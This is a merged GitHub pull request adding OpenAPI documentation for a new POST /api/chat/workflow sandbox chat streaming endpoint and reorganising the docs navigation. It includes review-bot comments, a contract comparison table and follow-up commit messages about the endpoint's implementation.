Skip to content

docs: add /api/chat/workflow contract + promote Chats to top-level nav#221

Merged
sweetmantech merged 5 commits into
mainfrom
feat/api-chat-workflow-contract
May 21, 2026
Merged

docs: add /api/chat/workflow contract + promote Chats to top-level nav#221
sweetmantech merged 5 commits into
mainfrom
feat/api-chat-workflow-contract

Conversation

@sweetmantech

@sweetmantech sweetmantech commented May 21, 2026

Copy link
Copy Markdown
Collaborator

Summary

Documentation-driven scoping for the upcoming Vercel-Workflow-backed chat endpoint that will live at POST /api/chat/workflow in api. Landing the contract first so the chat team can integrate against a real spec while the implementation is being ported from open-agents.

  • New OpenAPI path /api/chat/workflow with ChatWorkflowRequest schema (messages, chatId, sessionId, recoupAccessToken?) under Bearer apiKeyAuth
  • Response: text/event-stream + x-workflow-run-id response header
  • Documented status codes: 200 / 400 (incl. "Sandbox not initialized") / 401 / 404 / 409 (duplicate workflow for chat)
  • Frontmatter-only MDX page at api-reference/chat/workflow.mdx per docs CLAUDE.md convention — all prose lives in the OpenAPI description
  • Nav entry under Research → Chat, listed first

The endpoint description verbally maps the deferred sibling routes (GET /api/chat/{chatId}/stream, POST /api/chat/{chatId}/stop) so reviewers see the full planned surface without creating orphan "Coming soon" pages.

This endpoint is parallel to the existing POST /api/chat — does not replace it. The legacy endpoint continues to serve MCP- and Composio-tool chat for clients that need it.

Background

Migration plan worked through in Slack (#recoup) between Sweetman and Arpit on 2026-05-20. Decision: port the open-agents /api/chat agent loop into api as /api/chat/workflow, swap the MCP toolset for the sandbox-only tool set (bash, read, write, grep, glob, todo, task, ask_user_question, skill, fetch), and rely on the recoupable/skills:recoup-api skill (already installed in every sandbox) as the HTTP bridge back to the API.

This is PR 1 of 5. Subsequent PRs land against api:

  1. Route stub: POST /api/chat/workflow with body validation + hardcoded UIMessage stream
  2. Port 10 sandbox tool files + buildAgentTools factory (no wiring)
  3. Port route-level helpers (createChatRuntime, agentCustomInstructions, extractOrgId, compareAndSetChatActiveStreamId, touchChat, reconcileExistingActiveStream, persistLatestUserMessage)
  4. Wire it all together — runAgentWorkflow + runAgentStep + replace stub with real start()

Test plan

  • Mintlify preview renders the new page under Research → Chat → Stream Chat (Workflow + Sandbox)
  • OpenAPI playground for /api/chat/workflow loads with request body, auth, and all five status codes
  • Legacy POST /api/chat page (api-reference/chat/stream) still renders unchanged
  • No broken cross-links — page references /api-reference/sandbox/create, /api-reference/sessions/create, /api-reference/sessions/create-chat, /api-reference/chat/stream

🤖 Generated with Claude Code


Summary by cubic

Adds the contract and docs for POST /api/chat/workflow, a Vercel Workflow–backed, sandbox-only chat streaming endpoint. Also promotes Chats to a top-level tab and trims the endpoint/schema descriptions to house style.

  • New Features

    • OpenAPI path POST /api/chat/workflow secured by apiKeyAuth.
    • ChatWorkflowRequest schema: messages, chatId, sessionId; optional context.contextLimit; no recoupAccessToken (Authorization header is forwarded into the sandbox).
    • Response: text/event-stream with x-workflow-run-id header; status codes: 200, 400 (sandbox not initialized), 401, 403, 404, 409.
    • Docs page api-reference/chat/workflow.mdx; endpoint and schema descriptions tightened. Notes future GET /api/chat/{chatId}/stream and POST /api/chat/{chatId}/stop.
  • Docs Navigation

    • New top-level tab: Chats.
    • Streaming group lists api-reference/chat/workflow, api-reference/chat/stream, api-reference/chat/generate.
    • Other chat pages reorganized under Chats and Messages groups.

Written for commit 6d33bfa. Summary will update on new commits. Review in cubic

Summary by CodeRabbit

  • New Features
    • New streaming chat workflow API endpoint (POST /api/chat/workflow) with session management capabilities
    • Built-in support for workflow execution control via x-workflow-run-id response headers
    • Complete API reference documentation added with request schema specifications and error handling details

Review Change Stack

Documentation-driven scoping for the upcoming Vercel-Workflow-backed
chat endpoint. Adds:

- New OpenAPI path /api/chat/workflow with ChatWorkflowRequest schema
  (messages, chatId, sessionId, recoupAccessToken) — Bearer apiKeyAuth
- Response: text/event-stream + x-workflow-run-id header
- Documented status codes: 200 / 400 / 401 / 404 / 409
- Frontmatter-only MDX page (per docs CLAUDE.md convention)
- Nav entry under Research > Chat, listed first

The endpoint description notes the deferred sibling routes
(GET /api/chat/{chatId}/stream, POST /api/chat/{chatId}/stop) so
the full surface is mapped without creating orphan pages.

Parallel to existing POST /api/chat — does not replace it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@coderabbitai

coderabbitai Bot commented May 21, 2026

Copy link
Copy Markdown
📝 Walkthrough

Walkthrough

This PR documents a new workflow-backed chat streaming API endpoint. It adds an OpenAPI specification for POST /api/chat/workflow that accepts workflow chat requests and streams UI message parts via server-sent events, includes a new request schema defining required inputs, and creates corresponding documentation with navigation integration.

Changes

Workflow Chat API Documentation

Layer / File(s) Summary
Workflow chat request schema
api-reference/openapi/research.json
ChatWorkflowRequest schema defines required workflow inputs (messages, chatId, sessionId) and optional recoupAccessToken for Recoup API access.
Workflow chat endpoint
api-reference/openapi/research.json
POST /api/chat/workflow endpoint streams UI message parts via text/event-stream, includes x-workflow-run-id response header for resume/stop operations, and documents error responses (400/401/404/409) using ChatStreamErrorResponse.
API documentation page and navigation
api-reference/chat/workflow.mdx, docs.json
New MDX page with frontmatter linking to the endpoint specification and navigation entry added to the Research > Chat section.

Sequence Diagram

sequenceDiagram
  participant Client
  participant WorkflowEndpoint as POST /api/chat/workflow
  participant EventStream as text/event-stream
  Client->>WorkflowEndpoint: POST with ChatWorkflowRequest
  WorkflowEndpoint->>WorkflowEndpoint: Validate messages, chatId, sessionId
  WorkflowEndpoint->>EventStream: Stream UI message parts
  EventStream-->>Client: Return x-workflow-run-id header
  EventStream-->>Client: Stream event data
  Client->>WorkflowEndpoint: Resume/stop via x-workflow-run-id
Loading

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Poem

🐰 A workflow takes shape, streaming with care,
Request and response dancing in air,
Messages flowing through the event stream's thread,
Documentation guides where the endpoint is led,
New paths in the schema, navigation so bright!

🚥 Pre-merge checks | ✅ 5
✅ Passed checks (5 passed)
Check name Status Explanation
Docstring Coverage ✅ Passed No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
Linked Issues check ✅ Passed Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check ✅ Passed Check skipped because no linked issues were found for this pull request.
Title check ✅ Passed The title accurately describes the two main changes: adding OpenAPI documentation for /api/chat/workflow and promoting Chats to top-level navigation.
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing Touches
📝 Generate docstrings
  • Create stacked PR
  • Commit on current branch
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Commit unit tests in branch feat/api-chat-workflow-contract

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

@coderabbitai coderabbitai Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@api-reference/chat/workflow.mdx`:
- Around line 1-4: The frontmatter in this MDX page is missing a description
field; update the frontmatter block (the YAML between the leading --- markers
that currently contains title and openapi) to add a descriptive "description"
key that succinctly summarizes the page (e.g., purpose of the Stream Chat
Workflow + Sandbox API), ensuring the new description follows the existing style
and uses clear, self-documenting wording.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro

Run ID: c31d3aea-0679-48b3-afda-96da86c493ad

📥 Commits

Reviewing files that changed from the base of the PR and between c55693f and 1270883.

📒 Files selected for processing (3)
  • api-reference/chat/workflow.mdx
  • api-reference/openapi/research.json
  • docs.json

Comment on lines +1 to +4
---
title: 'Stream Chat (Workflow + Sandbox)'
openapi: 'POST /api/chat/workflow'
---

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

Add a description field to frontmatter.

This API reference page is correctly frontmatter-only, but it is missing description metadata.

Proposed fix
 ---
 title: 'Stream Chat (Workflow + Sandbox)'
+description: 'Stream sandbox-driven chat via Vercel Workflow.'
 openapi: 'POST /api/chat/workflow'
 ---

As per coding guidelines: **/*.mdx: "Use MDX (Markdown + JSX) for documentation pages with frontmatter for page metadata (title, description)" and "Use clear, self-documenting titles and descriptions in documentation".

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
---
title: 'Stream Chat (Workflow + Sandbox)'
openapi: 'POST /api/chat/workflow'
---
---
title: 'Stream Chat (Workflow + Sandbox)'
description: 'Stream sandbox-driven chat via Vercel Workflow.'
openapi: 'POST /api/chat/workflow'
---
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@api-reference/chat/workflow.mdx` around lines 1 - 4, The frontmatter in this
MDX page is missing a description field; update the frontmatter block (the YAML
between the leading --- markers that currently contains title and openapi) to
add a descriptive "description" key that succinctly summarizes the page (e.g.,
purpose of the Stream Chat Workflow + Sandbox API), ensuring the new description
follows the existing style and uses clear, self-documenting wording.

@cubic-dev-ai cubic-dev-ai Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

No issues found across 3 files

Re-trigger cubic

Chats was buried as the first group under Research, where it shared
nav space with Artist discovery / Metrics / Catalog / etc. — none of
which are conceptually adjacent. Promote it to a top-level tab and
break the 12-page flat list into three sub-groups so the surface is
scannable:

- Streaming: workflow, stream, generate (the agent-run endpoints)
- Chats: create, chats (list), artist, update, delete, compact (room CRUD)
- Messages: messages, messages-copy, messages-trailing-delete

Tab order: Quickstart → Artists → Chats → Research → ... — Chats sits
next to Artists since they're the two primary product surfaces.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@sweetmantech sweetmantech changed the title docs(api-reference): add POST /api/chat/workflow contract docs: add /api/chat/workflow contract + promote Chats to top-level nav May 21, 2026
The Bearer API key in the Authorization header is the authoritative
caller identity — passing it again in the body is redundant. The
implementation will forward the header into the sandbox so the
recoupable/skills:recoup-api skill can authenticate calls back.

Updated the schema description to make the header-forwarding pattern
explicit, removed the body field, and trimmed the example.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@sweetmantech

Copy link
Copy Markdown
Collaborator Author

Contract diff vs. open-agents reference

Comparing what this PR documents against what open-agents/apps/web/app/api/chat/route.ts + _lib/request.ts + _lib/chat-context.ts actually accept and return today.

Request body

Field Open-agents accepts PR #221 documents Status
messages required, array (custom-cast to WebAgentUIMessage[]) required, UIMessage[] ref ✅ match
chatId optional at schema, enforced via requireChatIdentifiers (400) required at schema ✅ same net behavior
sessionId optional at schema, enforced via requireChatIdentifiers (400) required at schema ✅ same net behavior
recoupAccessToken optional, z.string().min(1).max(8192) not in bodyAuthorization header forwarded into sandbox instead ⚠️ intentional divergence (api uses Bearer key as caller identity)
context.contextLimit optional, number not documented ❌ gap — add to schema

Response — success

Aspect Open-agents returns PR #221 documents Status
Status 200 200
Content-Type text/event-stream (via createUIMessageStreamResponse) same
Body UIMessage chunks same
x-workflow-run-id header yes yes

Response — errors

Status Open-agents emits PR #221 documents Status
400 (bad JSON / bad body / missing identifiers / sandbox inactive) { "error": "...", "issues"?: ZodIssue[] } ChatStreamErrorResponse = { "status": "error", "message": "..." } ❌ shape mismatch
401 { "error": "Not authenticated" } (cookie-based) ChatStreamErrorResponse (Bearer-based) ❌ shape mismatch + ⚠️ auth differs by design
403 (ownership mismatch / trial limit) { "error": "Forbidden" } / { "error": MANAGED_TEMPLATE_TRIAL_MESSAGE_LIMIT_ERROR } not documented ❌ gap — add 403 (api will need it for Bearer-key-owns-session check)
404 (session not found / chat not found) { "error": "Session not found" } / { "error": "Chat not found" } ChatStreamErrorResponse ❌ shape mismatch
409 (workflow conflict) { "error": "Another workflow is already running for this chat" } ChatStreamErrorResponse ❌ shape mismatch

Auth model

Intentional divergence — already locked in our plan: open-agents uses session cookie (requireAuthenticatedUsergetServerSession), this PR documents Bearer apiKeyAuth since that's the api codebase convention and unlocks bring-your-own-agent usage.

Action items before merge

  1. Add optional context.contextLimit: number to ChatWorkflowRequest — small omission, no design decision needed
  2. Add 403 to the response list — needed for Bearer-key-doesn't-own-session-or-chat (analogous to open-agents' ownership check)
  3. Decision: error response shape — open-agents returns { "error": "..." }. The legacy ChatStreamErrorResponse I reused returns { "status": "error", "message": "..." }. Pick one:
    • Option A: define a new ChatWorkflowErrorResponse matching open-agents ({ error: string, issues?: array }) — clients that integrate against open-agents today work unchanged against api
    • Option B: keep ChatStreamErrorResponse for consistency with the legacy api endpoints — clients must adapt error parsing when porting
    • Recommendation: Option A — the whole point of the contract match is drop-in portability; error parsing is part of that contract

Want me to push the fixes (add context, add 403, switch to a new error schema matching open-agents) before this merges?

Close two contract gaps surfaced by the open-agents diff (PR comment):

- Add optional `context.contextLimit: number` to ChatWorkflowRequest
  so clients that already send `context` against open-agents' /api/chat
  port over unchanged.

- Document 403 in the response list — separate from 404 so callers can
  distinguish "session/chat doesn't exist" from "session/chat exists
  but the API key's account doesn't own it" (the ownership check the
  Bearer auth model requires).

Error response shape (`{status, message}` via ChatStreamErrorResponse)
intentionally kept — matches existing api convention rather than
open-agents' `{error, issues?}` shape.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@sweetmantech

Copy link
Copy Markdown
Collaborator Author

Both gaps fixed in ef8b51e:

  • ✅ Added optional context.contextLimit: number to ChatWorkflowRequest — matches open-agents body
  • ✅ Added 403 to response list — distinguishes "not found" from "exists but not owned by the API key's account"
  • ✅ Error response shape kept as ChatStreamErrorResponse ({status, message}) — matches existing api convention, intentional divergence from open-agents' {error, issues?} shape

Updated contract diff:

Aspect Open-agents PR #221 (after fix) Status
messages / chatId / sessionId as documented same ✅ match
context.contextLimit optional optional ✅ match
recoupAccessToken optional in body Bearer header forwarded ⚠️ intentional
Auth session cookie Bearer apiKeyAuth ⚠️ intentional
Success response (stream + x-workflow-run-id) as documented same ✅ match
Status codes 200/400/401/403/404/409 all emitted all documented ✅ match
Error body shape {error, issues?} {status, message} (ChatStreamErrorResponse) ⚠️ intentional — matches api convention

Endpoint description went from ~1500 chars (4 paragraphs) to ~450
chars (1 paragraph). Schema description from ~650 to ~310.

House style for this docs is 150-300 chars per endpoint description —
the verbose version was an outlier. Detail that lived in the long
description is already covered structurally:

- 409 conflict semantics → already on the 409 response description
- x-workflow-run-id header → already on the success response header
- Sandbox-not-initialized → already on the 400 response description
- Stream-resume on duplicate run → out of scope for endpoint-glance;
  belongs in the (deferred) /api/chat/{chatId}/stream docs

Keeps the must-haves: what it does, the tool list (the differentiator
vs /api/chat), the sandbox prereq, and the legacy-endpoint pointer.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@sweetmantech sweetmantech merged commit 5b4ec46 into main May 21, 2026
3 checks passed
@sweetmantech sweetmantech deleted the feat/api-chat-workflow-contract branch May 21, 2026 13:04
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
…579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
…579) (#580)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.



* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.



* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.



---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

